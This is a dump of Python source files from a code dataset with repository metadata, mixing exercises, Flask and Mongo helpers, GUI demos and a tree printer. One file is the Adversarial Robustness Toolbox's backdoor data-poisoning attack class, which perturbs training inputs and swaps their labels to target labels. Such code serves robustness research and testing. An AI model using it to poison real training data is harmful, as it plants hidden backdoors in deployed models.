blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
bc40d704453f4394e9649598f8859ae885f09efc | Python | dohy12/coding_test | /수치해석/0927.py | UTF-8 | 673 | 3.4375 | 3 | [] | no_license | # 엡실론 공부
# e**x = 1 + x + (x**2)/2 + (x**3)/3! + (x**4)/4! + ... + x**n/n!
def getEs(n):
    """Return the stopping criterion es (percent) for n significant figures.

    Scarborough criterion: es = 0.5 * 10**(2 - n).
    """
    return 0.5 * 10 ** (2 - n)
def getApprox(idx, num):
    """Taylor-series estimate of e**num using terms 0..idx.

    Terms are accumulated in ascending order, i.e.
    sum(num**i / i! for i = 0..idx).
    """
    return sum(num ** i / math.factorial(i) for i in range(idx + 1))
import math
# Demo: approximate e**num with the Taylor series until the approximate
# relative error ea (in percent) drops below the significance threshold es.
num = 3
es = getEs(5)
ea = 100  # start above es so the loop runs at least once
curr_approximation = 1 # current estimate
previous_approximation = 1 # previous estimate
idx = 0
while es<ea:
    idx +=1
    curr_approximation = getApprox(idx, num)
    previous_approximation = getApprox(idx-1, num)
    # NOTE(review): the standard formula uses abs(); works here because the
    # series for a positive num grows monotonically -- confirm for other inputs.
    ea = (curr_approximation - previous_approximation) / curr_approximation * 100
print(curr_approximation)
print(math.exp(3)) | true |
178a377df2a1430eb317bdba83f455199e3a3a37 | Python | cmmolanos1/holbertonschool-machine_learning | /pipeline/0x02-databases/105-students.py | UTF-8 | 823 | 3.125 | 3 | [] | no_license | #!/usr/bin/env python3
"""Sorting students"""
def top_students(mongo_collection):
    """Return all students sorted by average score (descending).

    Args:
        mongo_collection: the pymongo collection object.

    Returns:
        list of dicts, each containing the student's ``_id``, their
        ``averageScore`` (mean of ``topics.score``) and their ``name``.
    """
    score_pipeline = [
        {"$unwind": "$topics"},
        {"$group": {"_id": "$_id", 'averageScore': {"$avg": "$topics.score"}}},
        {"$sort": {'averageScore': -1}}
    ]
    name_pipeline = [
        {"$project": {"_id": 1, "name": 1}}
    ]
    averages_list = list(mongo_collection.aggregate(score_pipeline))
    # Build an _id -> name lookup table once so the join below is O(n)
    # instead of the previous O(n^2) nested scan.
    names_by_id = {doc['_id']: doc['name']
                   for doc in mongo_collection.aggregate(name_pipeline)}
    for avg in averages_list:
        if avg['_id'] in names_by_id:
            avg['name'] = names_by_id[avg['_id']]
    return averages_list
| true |
fa6793044b4c2c268f444b11aaf9be1afe4381ce | Python | bartelsmanlearnersprofile/bertelsmannlearners | /FlaskAPI/model.py | UTF-8 | 1,380 | 2.828125 | 3 | [] | no_license | from flask_marshmallow import Marshmallow
from flask_sqlalchemy import SQLAlchemy
from marshmallow import fields
db = SQLAlchemy()
ma = Marshmallow()
class Learner(db.Model, dict):
    """
    SQLAlchemy model for a learner record (table ``learners``).

    NOTE(review): also inherits ``dict`` -- presumably to make instances
    directly mapping-like for serialisation; confirm this is intentional.
    """
    __tablename__ = 'learners'
    # All name columns are required (nullable=False); id is the primary key.
    id = db.Column(db.Integer, primary_key=True)
    slackname = db.Column(db.String(200), nullable=False)
    firstname = db.Column(db.String(200), nullable=False)
    lastname = db.Column(db.String(200), nullable=False)
    def __init__(self, slackname, firstname, lastname):
        """Create a learner with the given slack, first and last names."""
        super().__init__()
        self.slackname = slackname
        self.firstname = firstname
        self.lastname = lastname
# Marshmallow schema used to validate and serialise Learner payloads.
class LearnerSchema(ma.Schema):
    """Schema mirroring the Learner model; all name fields are required."""
    class Meta:
        # Bind the schema to the Learner model.
        model = Learner
    id = fields.Integer()
    slackname = fields.String(required=True)
    firstname = fields.String(required=True)
    lastname = fields.String(required=True)
# INFO: How to use the schema
# author = Author(name="Chuck Paluhniuk")
# author_schema = AuthorSchema()
# book = Book(title="Fight Club", author=author)
# session.add(author)
# session.add(book)
# session.commit()
#
# dump_data = author_schema.dump(author)
# print(dump_data)
# {'id': 1, 'name': 'Chuck Paluhniuk', 'books': [1]}
#
# load_data = author_schema.load(dump_data, session=session)
# print(load_data)
# <Author(name='Chuck Paluhniuk')>
learner_schema = LearnerSchema()
| true |
441b40563445e6021b0bfcbb33e72fefde394304 | Python | william881218/adversarial-robustness-toolbox | /art/attacks/poisoning/backdoor_attack.py | UTF-8 | 3,701 | 2.703125 | 3 | [
"MIT"
] | permissive | # MIT License
#
# Copyright (C) The Adversarial Robustness Toolbox (ART) Authors 2020
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module implements Backdoor Attacks to poison data used in ML models.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
from typing import Callable, List, Optional, Tuple, Union
import numpy as np
from art.attacks.attack import PoisoningAttackBlackBox
logger = logging.getLogger(__name__)
class PoisoningAttackBackdoor(PoisoningAttackBlackBox):
    """
    Backdoor poisoning attack from Gu, et. al. 2017.

    Applies one or more backdoor perturbation functions to the input and
    switches the labels to the attacker-chosen target label.

    | Paper link: https://arxiv.org/abs/1708.06733
    """

    attack_params = PoisoningAttackBlackBox.attack_params + ["perturbation"]
    _estimator_requirements = ()

    def __init__(self, perturbation: Union[Callable, List[Callable]]) -> None:
        """
        Create a backdoor poisoning attack.

        :param perturbation: A single perturbation function, or a list of
            perturbation functions, each modifying the input samples.
        """
        super().__init__()
        self.perturbation = perturbation
        self._check_params()

    def poison(
        self, x: np.ndarray, y: Optional[np.ndarray] = None, broadcast=False, **kwargs
    ) -> Tuple[np.ndarray, np.ndarray]:
        """
        Apply the configured perturbation(s) to ``x`` and pair the result
        with the poison labels.

        :param x: An array with the points that initialize attack points.
        :param y: The target labels for the attack.
        :param broadcast: whether or not to broadcast single target label
        :return: A tuple holding the `(poisoning_examples, poisoning_labels)`.
        """
        # Targeted attack: labels are mandatory.
        if y is None:
            raise ValueError("Target labels `y` need to be provided for a targeted attack.")
        y_attack = np.broadcast_to(y, (x.shape[0], y.shape[0])) if broadcast else np.copy(y)

        if len(x) == 0:
            raise ValueError("Must input at least one poison point.")

        poisoned = np.copy(x)
        # Normalise a single callable into a one-element pipeline.
        perturbations = [self.perturbation] if callable(self.perturbation) else self.perturbation
        for perturb in perturbations:
            poisoned = perturb(poisoned)
        return poisoned, y_attack

    def _check_params(self) -> None:
        # Accept either one callable or an iterable of callables.
        perturbation_ok = callable(self.perturbation) or all(
            callable(perturb) for perturb in self.perturbation
        )
        if not perturbation_ok:
            raise ValueError("Perturbation must be a function or a list of functions.")
| true |
62749b8b99066f60d789bb52ef30d3de2c030ffd | Python | Vasallius/Python-Journey | /Automate the Boring Stuff With Python/Ch15-Working with PDF and Word Documents/pdf_paranoia_decrypt.py | UTF-8 | 1,402 | 3.125 | 3 | [] | no_license | # PDF Paranoia Decrypt
import os
import PyPDF2
import sys
# Make sure user enters two command line arguments
if len(sys.argv) < 2:
    # NOTE(review): usage text names the *encrypt* script; likely copy/paste.
    print('Usage: pdf_paranoia_encrypt.py <password>')
    sys.exit()
password = sys.argv[1]
# Code for testing if encryption was successful
print('Now testing to decrypt...')
# Walk the current directory tree looking for '*_encrypted.pdf' files.
# NOTE(review): 'dir' and 'file' shadow builtins, and 'filename' is opened
# without joining 'root', so only files in the working directory will open.
for root, dir, file in os.walk(os.getcwd()):
    for filename in file:
        # Skip non-encrypted PDFs
        if not filename.endswith('_encrypted.pdf'):
            continue
        # Try to open PDFs
        try:
            pdfFileObj = open(filename, 'rb')
            pdfReader = PyPDF2.PdfFileReader(pdfFileObj)
        except:
            # NOTE(review): bare except hides the real error, and pdfReader
            # may be unbound below when the open/parse fails.
            print(f'(unknown) cannot be opened')
        if pdfReader.isEncrypted == True:
            decryptSuccess = pdfReader.decrypt(password)
            if decryptSuccess == True:
                print('Password decryption was successful')
                pdfWriter = PyPDF2.PdfFileWriter()
                # Copy every page into a new, unencrypted writer.
                for pagenum in range(pdfReader.numPages):
                    pageobj = pdfReader.getPage(pagenum)
                    pdfWriter.addPage(pageobj)
                # Strip the '_encrypted.pdf' suffix (14 chars) for the output name.
                decryptedpdf = open(f'{filename[:-14]}.pdf', 'wb')
                pdfWriter.write(decryptedpdf)
                print(f'{filename[:-14]} created without password')
            else:
                print('Password decryption was unsuccessful')
        else:
            pass
| true |
c0db691034b0bde5dd079208d512c889ad4ddca7 | Python | cempionai/0a9db264dffd68c8f8b6e591835c526b | /libraries/BaseMethods.py | UTF-8 | 1,091 | 3.515625 | 4 | [] | no_license | #!/usr/bin/python
# coding=utf-8
# @author: Tadas Krisciunas
import re
class BaseMethods:
    """ A class implementing a few methods for inheriting classes.
        Should not be used directly, but of course can if need be.
    """

    # Characters stripped during normalisation; `punctuation` is the subset
    # of true punctuation marks (kept for subclasses that need it).
    removed = [u'.', u',', u'-', u'!', u'?', u'–', u';', u':',
               u'—', u'(', u')', u'\n', u'„', u'“', u'"']
    punctuation = [u'.', u',', u'-', u'!', u'?', u'–', u';', u':', u'—', u'(', u')']

    @staticmethod
    def prepare_sentence(sentence):
        """ Prepares sentence (a list of words) for later parsing.

        Lower-cases each word, strips the characters in ``removed`` and
        drops words that end up empty.  NOTE: single-character words are
        skipped entirely (original behaviour, kept for compatibility).
        """
        new_sentence = []
        for word in sentence:
            word = word.lower()
            if len(word) > 1:
                for symbol in BaseMethods.removed:
                    word = word.replace(symbol, '')
                if word != '':
                    new_sentence.append(word)
        return new_sentence

    @staticmethod
    def prepare_text(text):
        """ Prepares simple text for parsing:
            leaves only lowercase words separated by single spaces.
        """
        text = text.lower()
        for symbol in BaseMethods.removed:
            # BUG FIX: str.replace returns a new string (strings are
            # immutable); the result was previously discarded, so the
            # punctuation was never actually removed.
            text = text.replace(symbol, ' ')
        return re.sub(re.compile(r'\s+'), ' ', text)
| true |
04de07a2a1e85cdeb6548b901352b85764152270 | Python | AdrienLemaire/Katas | /prime_factor/.codersdojo/2012-03-27_15-13-42/state_0/prime_factor.py | UTF-8 | 141 | 2.875 | 3 | [] | no_license | # Adapt the code to your code kata prime_factor.
def prime_factor(nb):
    """Kata stub: currently the identity function (to be implemented)."""
    return nb
def test_prime_1():
    # Baseline kata test: 1 has no prime factors, so it maps to itself.
    assert prime_factor(1) == 1
| true |
47180a9be11b4a21e481b7f5cb754697344f800e | Python | lerman2003/Python3-Junior | /Lesson2/HomeWork4_(Leson2).py | UTF-8 | 170 | 3.5 | 4 | [] | no_license | S=float(input("Длина пути(в метрах)"))
# Read the speed in m/s (path length S was read on the line above).
U=float(input("Скорость(м/с)"))
# Travel time = distance / speed; raises ZeroDivisionError when U == 0.
t=S/U
print("---------")
print("Время(в секундах)",t)
| true |
43abdef0bf5fc0411c7314ae3a337fa66c5ed318 | Python | martintb/typyEnv | /Environment.py | UTF-8 | 2,565 | 2.53125 | 3 | [
"MIT"
] | permissive | from __future__ import print_function
import os
from typyEnv.Path import Path
from typyEnv.PathMod import PathMod
class Environment(object):
    """Collects PATH-like environment variable modifications from packages
    and renders them as shell export strings.

    Regular variables live in ``self.paths``; developer flag variables
    (LDFLAGS/CPPFLAGS) are built lazily in ``export()`` from the queued
    ``lib_mods``/``inc_mods`` and stored in ``self.dev_paths``.
    """

    def __init__(self):
        self.paths = {}      # env-var name -> Path object (regular variables)
        self.dev_paths = {}  # env-var name -> Path object (LDFLAGS/CPPFLAGS)
        self.lib_mods = []   # queued -L<dir> modifications for LDFLAGS
        self.inc_mods = []   # queued -I<dir> modifications for CPPFLAGS

    # NOTE: adding the same path twice to a variable is not de-duplicated.
    def add_package(self, pkg, export_dev_paths=False):
        """Apply all path modifications of a loaded package.

        With export_dev_paths=True, paths that contain libraries/headers are
        also queued as -L/-I flags for LDFLAGS/CPPFLAGS (emitted in export()).
        """
        if pkg.loaded:
            print('--> Adding package {} version {} to {}'.format(pkg.name, pkg.version, pkg.modded_paths))
        else:
            print('==> Error! Package not loaded! Need to call pkg.read()!')
            exit(1)

        for mod in pkg.path_mods:
            self.mod_path(mod)
            if export_dev_paths:
                if 'libraries' in mod.contains:
                    print('--> Appending library path {} to LDFLAGS'.format(mod.value))
                    self.lib_mods.append(PathMod(name='LDFLAGS', action='append', value='-L{}'.format(mod.value)))
                if 'headers' in mod.contains:
                    print('--> Appending header path {} to CPPFLAGS'.format(mod.value))
                    self.inc_mods.append(PathMod(name='CPPFLAGS', action='append', value='-I{}'.format(mod.value)))

    def mod_path(self, mod, action=None, dev=False, sep=':'):
        """Apply a single PathMod to the regular (dev=False) or developer
        (dev=True) path table, creating the Path entry on first use."""
        paths = self.dev_paths if dev else self.paths
        # BUG FIX: the membership test previously used self.paths even when
        # dev=True, which raised KeyError when the name existed only in
        # self.paths, and clobbered existing dev entries in the other case.
        if mod.name not in paths:
            paths[mod.name] = Path(os.environ.get(mod.name, None), mod.name, sep=sep)
        paths[mod.name].modify(mod, action=action)

    def remove_package(self, pkg):
        """Undo the path modifications of a loaded package (regular paths only)."""
        if pkg.loaded:
            print('--> Removing package {} version {} from {}'.format(pkg.name, pkg.version, pkg.modded_paths))
        else:
            print('==> Error! Package not loaded! Need to call pkg.read()!')
            exit(1)

        for mod in pkg.path_mods:
            if mod.name not in self.paths:
                path = Path(os.environ.get(mod.name, None), mod.name)
                self.paths[mod.name] = path
            self.paths[mod.name].modify(mod, action='remove')

    def export(self, export_dev_paths=False):
        """Return (dev_str, variables_str, export_str) shell snippets.

        ``variables_str`` assigns the regular variables, ``dev_str`` (only
        populated with export_dev_paths=True) assigns LDFLAGS/CPPFLAGS, and
        ``export_str`` is a single ``export NAME1 NAME2 ...;`` statement.
        """
        variables_str = ''
        export_list = ['export']
        for name, path in self.paths.items():
            variables_str += '{}={};'.format(name, path.join())
            export_list.append('{}'.format(name))

        dev_str = ''
        if export_dev_paths:
            # Flag variables are space-separated, not colon-separated.
            for mod in self.lib_mods:
                self.mod_path(mod, dev=True, sep=' ')
            for mod in self.inc_mods:
                self.mod_path(mod, dev=True, sep=' ')
            for name, path in self.dev_paths.items():
                dev_str += '{}=\'{}\';'.format(name, path.join())
                export_list.append('{}'.format(name))

        export_str = ' '.join(export_list)
        export_str += ';'
        return dev_str, variables_str, export_str
| true |
0c36cd41877f19065792f9206a25da1d3104ca97 | Python | estraviz/codewars | /7_kyu/Find the Capitals (of a state or country)/python/solution.py | UTF-8 | 289 | 3.96875 | 4 | [] | no_license | # Find the Capitals
def capital(capitals):
    """Build one "The capital of <state> is <capital>" sentence per dict."""
    sentences = []
    for record in capitals:
        info = dict(record)
        c = info.pop('capital')
        # Whatever key remains names the state/country; take the last value
        # to mirror the original dict-iteration behaviour.
        s = list(info.values())[-1]
        sentences.append(f"The capital of {s} is {c}")
    return sentences
| true |
4dc0eac89a811e5b385c6940d46de0f5f9ba9737 | Python | ItsDrike/Mitosis | /cell.py | UTF-8 | 3,065 | 3.546875 | 4 | [] | no_license | import typing as t
from random import randint, choice, uniform
from util import Colors, euclidean_distance
class Cell:
    """A circular cell that can split (mitosis), drift and jiggle."""
    # Per-frame speed decay applied in move().
    DEACCELERATION_RATE = 0.05
    def __init__(
        self,
        x: float,
        y: float,
        radius: float,
        color: t.Optional[Colors.ColorType] = None,
        x_speed: float = 0,
        y_speed: float = 0,
    ) -> None:
        """Create a cell at (x, y); speed signs are stored separately as
        direction multipliers so speeds themselves stay non-negative."""
        self.x = x
        self.y = y
        self.radius = radius
        self.color = color if color else Colors.RANDOM()
        self.x_positive = 1 if x_speed > 0 else -1
        self.y_positive = 1 if y_speed > 0 else -1
        self.x_speed = abs(x_speed)
        self.y_speed = abs(y_speed)
    def mitosis(
        self,
        new_color: t.Optional[Colors.ColorType] = None
    ) -> t.Tuple["Cell", "Cell"]:
        """Handle cell splitting in mitosis process.

        Returns two smaller cells (80% radius) that fly apart with exactly
        opposite velocity vectors."""
        new_radius = self.radius * 0.8
        new_color = new_color if new_color else self.color
        # Compute speeds so that when vectors are added, result will be 0
        x_speed = randint(0, round(self.radius))
        y_speed = self.radius - x_speed
        x_speed /= 8
        y_speed /= 8
        # Randomise the direction of each axis independently.
        x_mult = choice([1, -1])
        y_mult = choice([1, -1])
        x_speed *= x_mult
        y_speed *= y_mult
        cell_1 = Cell(self.x, self.y, new_radius, new_color, x_speed, y_speed)
        cell_2 = Cell(self.x, self.y, new_radius, new_color, x_speed * -1, y_speed * -1)
        return (cell_1, cell_2)
    def jiggle(self) -> None:
        """Add a minor jiggling of the cells."""
        self.x += uniform(-1.5, 1.5)
        self.y += uniform(-1.5, 1.5)
    def move(self) -> None:
        """Movement of the cells: advance by the current speed, decelerate,
        and always jiggle a little."""
        # Clamp any speed that decayed past zero.
        if self.x_speed < 0:
            self.x_speed = 0
        if self.y_speed < 0:
            self.y_speed = 0
        if self.x_speed:
            self.x += self.x_speed * self.x_positive
            self.x_speed -= self.DEACCELERATION_RATE
        if self.y_speed:
            self.y += self.y_speed * self.y_positive
            self.y_speed -= self.DEACCELERATION_RATE
        self.jiggle()
    @property
    def shape(self) -> t.Tuple[t.Tuple[int, int], int]:
        """Integer ((x, y), radius) tuple suitable for drawing."""
        return ((round(self.x), round(self.y)), round(self.radius))
    def _overlaps(self, other: "Cell") -> bool:
        """Check if 2 cells overlaps each other (touching counts)."""
        distance = euclidean_distance(self.x, self.y, other.x, other.y)
        radius_sum = self.radius + other.radius
        return distance <= radius_sum
    @classmethod
    def make_cell(cls, width: int, height: int, cells: t.List["Cell"]) -> "Cell":
        """
        This function creates a cell which
        doesn't overlap with other cells defined in `cells`.

        Retries recursively until a free spot is found -- may recurse deeply
        on a crowded field.
        """
        r = randint(18, 38)
        x = randint(r, width - r)
        y = randint(r, height - r)
        cell = cls(x, y, r)
        # Check for overlap; for-else runs `return cell` only when no
        # existing cell overlapped the candidate.
        for existing_cell in cells:
            if existing_cell._overlaps(cell):
                break
        else:
            return cell
        return cls.make_cell(width, height, cells)
| true |
f986af16c4e9ea7f6881a02fb6a950b06ea34faa | Python | shruthigokul/Python | /Python/Activity6.py | UTF-8 | 153 | 3.5625 | 4 | [] | no_license | num=int(input("enter a number within 10"))
# Print a number triangle: row n contains the digit n repeated n times.
for n in range(1,num+1):
    for j in range(n):
        print(n,end='')
    # Newline after each row.
    print()
| true |
4c31045bbb403a4f5fc04cdc38793af0812bf494 | Python | hugohadfield/WhistyMcWhistface | /Assorted/jsonTest.py | UTF-8 | 404 | 2.796875 | 3 | [] | no_license |
import json
from pprint import pprint
def doJson(configFileName):
    """Print the PlayerConfigFile entry for every GameParameters item
    found in the given JSON configuration file."""
    with open(configFileName) as config_file:
        config = json.load(config_file)
    for params in config["GameParameters"]:
        print(params["PlayerConfigFile"])
doJson("GameConfigFile.json") | true |
f5148d66c5a5703e7fc7da100428a6ce3940520c | Python | ohjooyeong/python_algorithm | /InflearnPythonAlgorithm/Section2(Search&Simulation)/2-3.py | UTF-8 | 519 | 3.265625 | 3 | [] | no_license | # 카드 역배치
def reverse(x):
    """Return a new list containing the elements of x in reverse order.

    Accepts any sequence and always returns a list, matching the original
    index-by-index implementation but using the built-in `reversed`.
    """
    return list(reversed(x))
# Cards 1..20; each input line "a b" reverses the 1-indexed range [a, b].
arr = list(range(1, 21))
for _ in range(10):
    a, b = map(int, input().split())
    arr[a-1:b] = reverse(arr[a-1:b])
# Print the final arrangement space-separated.
for i in arr:
    print(i, end=' ')
"""
정답지
a = list(range(21))
for _ in range(10):
s, e = map(int, input().split())
for i in range((e - s + 1) // 2):
a[s + i], a[e - i] = a[e - i], a[s + i]
a.pop(0)
for x in a:
print(x, end=' ')
""" | true |
50dec5d4a3f43fb494ed58f495e5a484c4d5a85a | Python | ClaudeMa/pyAirmail | /src/widgets.py | UTF-8 | 2,437 | 3.171875 | 3 | [] | no_license | import Tkinter as tk
from Tkconstants import *
import ttk
import tkMessageBox as tMB
import re
class ValidEntry(ttk.Entry):
    """A ttk.Entry validated against a regular expression.

    When validation runs (by default on focus-out) and the text does not
    match the regex, an error dialog is shown and focus stays on the widget.
    """
    def __init__(self, master = None, width = 20, style = None, justify = tk.RIGHT,
                 validateStr = r'^.*$', validate = 'focusout'):
        # Variable backing the entry text.
        self.cVar = tk.StringVar()
        # Regex the entry must match.
        self.validateStr = validateStr
        # Register the Python callbacks with Tcl so Tk can invoke them.
        self.validateFun = master.register(self.validateEntry)
        self.invalidFun = master.register(self.invalidEntry)
        ttk.Entry.__init__(self, master, style = style, width = width, justify = justify,
                           textvariable = self.cVar, validatecommand = self.validateFun,
                           invalidcommand = self.invalidFun, validate = validate)

    def validateEntry(self):
        """Return True when the current text matches the regex or is empty."""
        pattern = re.compile(self.validateStr + '|^$', re.VERBOSE)
        return pattern.match(self.cVar.get()) is not None

    def invalidEntry(self):
        """Show an error dialog and keep focus/selection on this widget."""
        message = 'Invalid entry: {}\nentry must match {}'.format(self.cVar.get(), self.validateStr)
        tMB.showerror('Invalid entry', message)
        self.focus_set()
        self.selection_own()
class LabeledEntry(ttk.Frame):
    """Provides a ValidEntry field, prefixed by a text label"""
    def __init__(self, master = None, labelText = "Label", entryWidth = None, entryJustify = tk.LEFT,
                 entryValidateStr = r'^.*$', frameStyle = None, entryStyle = None, labelStyle = None):
        """Calls ttk.Frame contructor and then places a right-aligned label followed
        by a left-aligned ValidEntry box inside the frame.

        NOTE(review): entryJustify, entryStyle and labelStyle are accepted
        but currently unused -- confirm whether they should be forwarded.
        """
        ttk.Frame.__init__(self, master, class_ = "LabeledEntry", style = frameStyle)
        # Label in column 0 (right-aligned), entry in column 1 (left-aligned).
        self.label = ttk.Label(self, text = labelText, justify=tk.LEFT)
        self.label.grid(row = 0, column = 0, sticky = tk.E)
        self.entry = ValidEntry(self, width = entryWidth, validateStr = entryValidateStr)
        self.entry.grid(row = 0, column = 1, sticky = tk.W)
    def set(self, text):
        # Replace the entry text.
        self.entry.cVar.set(text)
    def get(self):
        # Return the current entry text.
        return self.entry.cVar.get()
360bda842d07b62e38d0a03aa2a230e89e211e91 | Python | YuanyuanQiu/LeetCode | /0402 Remove K Digits.py | UTF-8 | 420 | 2.828125 | 3 | [] | no_license | def removeKdigits(self, num: str, k: int) -> str:
        # Greedy monotonic-stack solution: repeatedly drop a digit that is
        # larger than its successor, keeping the remaining digits increasing.
        n = len(num)
        if n <= k:
            return '0'
        stack = ''
        for i in range(n):
            # Pop while we may still remove digits and the top is larger
            # than the incoming digit.
            while k and stack and int(num[i]) < int(stack[-1]):
                stack = stack[:-1]
                k -= 1
            stack += num[i]
        # k > 0: digits are already non-decreasing, so drop the last k digits.
        if k:
            res = stack[:-k]
        else:
            res = stack
        # Strip leading zeros; an empty result means the value is 0.
        return res.lstrip('0') or '0'
00fecea2f9e6caf93b67fe5ad39e75cf10b4d732 | Python | RyHig/rypytree | /rypytree.py | UTF-8 | 3,469 | 3.328125 | 3 | [] | no_license | import pathlib
import argparse
LINES = '│ '
SPACE = ' '
def create_parser():
    """Construct the argparse parser for the rypytree command line."""
    parser = argparse.ArgumentParser(
        prog='rypytree.py',
        description='a program to list all the files and directories '
                    'in the specified directory. If no directory is specified, '
                    'the current directory will be used.')
    parser.add_argument('directory', metavar='/path/to/dir')
    parser.add_argument('-a', action='store_true',
                        help='show all files, including dotfiles.')
    parser.add_argument('-l', help='depth or level limit')
    return parser
'''
TODO:
if Directory == None.
Save the data into a Dictionary of Dictionaries?
Figure out how to add the tree-like display with the pipes.
Gotta add permission errors. *sigh*
I've got pipes. How do I stop them?
I think creating a list of strings to use as the pipes might be the answer.
arr = [LINES, LINES, LINES, LINES]
If Last item in directory or len(items_in_folder - 1)
arr[n-1] = [SPACES]
Problem with that solution:
the case where the inner directory finishes before the outer directories
├─ DIR:
│ ├─ FILE:
│ ├─ FILE:
│ ├─ DIR:
│ ├─ DIR:
│ ├─ DIR:
│ ├─ DIR:
│ ├─ FILE:
│ ├─ DIR:
│ ├─ DIR:
│ ├─ FILE:
│ ├─ FILE:
│ └─ FILE: <---- This will change arr[0] to SPACES
├─ DIR:
└─ FILE: <---- Causing this mess
├─ FILE:
└─ DIR:
├─ DIR: <--- These lines are correct though.
├─ DIR: <--- " " " " "
├─ DIR: <--- " " " " "
└─ DIR: <--- " " " " "
'''
def how_far(directory, hidden, limit=None, n=0, last_line=False):
    """Recursively print a tree listing of `directory`.

    :param directory: pathlib.Path to list
    :param hidden: include dotfiles when True
    :param limit: maximum recursion depth (None = unlimited)
    :param n: current depth (also the number of pipe prefixes to print)
    :param last_line: True when this call descends from the last entry of
        its parent (see the module TODO -- the pipe prefixes are known to be
        wrong in that case)
    """
    # Print the root directory itself once, at the top level.
    if n == 0:
        print(directory)
    if n == limit:
        return
    elif directory.is_dir():
        items_in_folder = [item for item in directory.iterdir()]
        for item in range(len(items_in_folder)):
            # NOTE(review): this guard skips *every* entry when the root call
            # is made with last_line=True -- confirm intended.
            if last_line == True and n == 0:
                pass
            else:
                # Skip dotfiles unless hidden listing was requested.
                if (items_in_folder[item].name).startswith('.') and not hidden:
                    pass
                elif item == len(items_in_folder) - 1:
                    # Last entry in the folder: use the corner connector.
                    if items_in_folder[item].is_dir():
                        print('{}{} DIR:{}'.format(LINES*n, "└─", items_in_folder[item].name))
                        how_far(items_in_folder[item], hidden, limit, n+1, last_line=True)
                    else:
                        print('{}{} FILE:{}'.format(LINES*n, "└─", items_in_folder[item].name))
                elif items_in_folder[item].is_dir():
                    print('{}{} DIR:{}'.format(LINES*n, "├─", items_in_folder[item].name))
                    how_far(items_in_folder[item], hidden, limit, n+1)
                else:
                    print('{}{} FILE:{}'.format(LINES*n, "├─", items_in_folder[item].name))
    else:
        return None
def limit_or_none(directory, hidden, limit):
    """Run how_far, converting the textual CLI depth limit to int when given.

    :param directory: pathlib.Path of the tree root
    :param hidden: include dotfiles when True
    :param limit: depth limit as a string from argparse, or None
    """
    if limit is None:  # identity check is the idiomatic None comparison
        how_far(directory, hidden)
    else:
        how_far(directory, hidden, int(limit))
if __name__ == "__main__":
    # Parse CLI args and print the tree rooted at the requested directory.
    parser = create_parser()
    args = parser.parse_args()
    p = pathlib.Path(args.directory)
    limit_or_none(p, args.a, args.l)
| true |
b5be5990d95959e1d81577f9a4eeb7b07d5b6df1 | Python | chenrui890206/pyqt5 | /2.7QObject定时器1.py | UTF-8 | 1,577 | 3.15625 | 3 | [] | no_license | from PyQt5.Qt import *
class MyLabel(QLabel):
    """Label that counts down from 10 once per tick using a QObject timer."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.setText("10")
        self.move(100, 100)
        self.setStyleSheet("font-size: 22px;")
    def startMyTimer(self, ms):
        # 1. startTimer(milliseconds, Qt.TimerType) starts the timer and
        #    returns a timer id, needed later to stop it via killTimer().
        # Qt.PreciseTimer: precise timer (keeps millisecond accuracy when possible)
        # Qt.CoarseTimer: coarse timer (5% error margin; the default)
        # Qt.VeryCoarseTimer: very coarse timer (second-level accuracy only)
        self.timer_id = self.startTimer(ms, Qt.CoarseTimer)
    # 2. Method invoked by Qt on every timer tick.
    def timerEvent(self, *args, **kwargs):
        print("xx")
        # Read the current countdown value from the label text.
        current_sec = int(self.text())
        current_sec -= 1
        self.setText(str(current_sec))
        if current_sec == 0:
            print("停止")
            # 3. Kill the timer task identified by timer_id.
            self.killTimer(self.timer_id)
class Window(QWidget):
    """Demo window hosting the countdown label."""
    def __init__(self):
        super().__init__()
        self.setWindowTitle("QObject的学习")
        self.resize(500, 500)
        self.setup_ui()
    def setup_ui(self):
        # Build the demo widgets.
        self.QObject定时器()
    def QObject定时器(self):
        # Create the countdown label and start its 1-second timer.
        label = MyLabel(self)
        label.setText("10")
        label.startMyTimer(1000)
if __name__ == '__main__':
    import sys
    # Start the Qt event loop with the demo window.
    app = QApplication(sys.argv)
    window = Window()
    # window = QWidget()
    window.show()
    sys.exit(app.exec_())
| true |
b48b7ecef92fee70f5f9b0519243db5906ef99c1 | Python | hwan1753/Samsung-SW | /D2/Water rate.py | UTF-8 | 342 | 3.140625 | 3 | [] | no_license | T = int(input())
for test_case in range(1,T+1):
    # P: flat per-liter price, Q: base fee covering R liters,
    # S: per-liter price beyond R, W: liters used.
    i = list(map(int,input().split()))
    P, Q, R, S, W = i[0], i[1], i[2], i[3], i[4]
    a = P * W
    if W <= R:
        b = Q
    else:
        b = Q + (W - R) * S
    # Print the cheaper of the two tariffs.
    if a > b:
        print("#" + str(test_case)+ " " + str(b))
    else:
        print("#" + str(test_case)+ " " + str(a))
| true |
5d33decd272a8f4ec871f0cacfc865391e5d97b4 | Python | Cytryn31/PracaMagisterska | /PracaMagisterska/PythonScripts/test.py | UTF-8 | 2,864 | 2.609375 | 3 | [] | no_license | from __future__ import print_function
import matplotlib.pyplot as plt
import numpy as np
from scipy import ndimage as ndi
from skimage import data
